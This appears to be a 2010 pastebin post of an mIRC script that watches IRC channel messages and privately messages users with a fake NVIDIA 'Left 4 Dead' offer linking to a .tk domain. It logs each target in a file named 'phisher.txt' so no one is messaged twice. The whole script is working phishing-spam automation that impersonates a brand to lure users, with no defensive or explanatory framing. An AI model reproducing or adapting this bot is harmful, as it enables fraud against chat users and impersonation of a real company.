Untitled
By: a guest | Mar 21st, 2010 | Syntax:
None | Size: 0.48 KB | Hits: 66 | Expires: Never
on *:TEXT:*:#: {
inc %phish
{
if (%phish == 1) && ($read($mircdir $+ \phisher.txt, s, $nick) == 1 ) {
halt
}
if (%phish == 1) && ($read($mircdir $+ \phisher.txt, s, $nick) != 1 ) {
msg $nick Hello, there is now a new offer from NVIDIA. If you have been looking for Left 4 Dead now is your chance. http://nvidiapromol4d.tk
write $mircdir $+ \phisher.txt $nick 1
halt
}
if (%phish == 5) {
set %phish 0
halt
}
}
}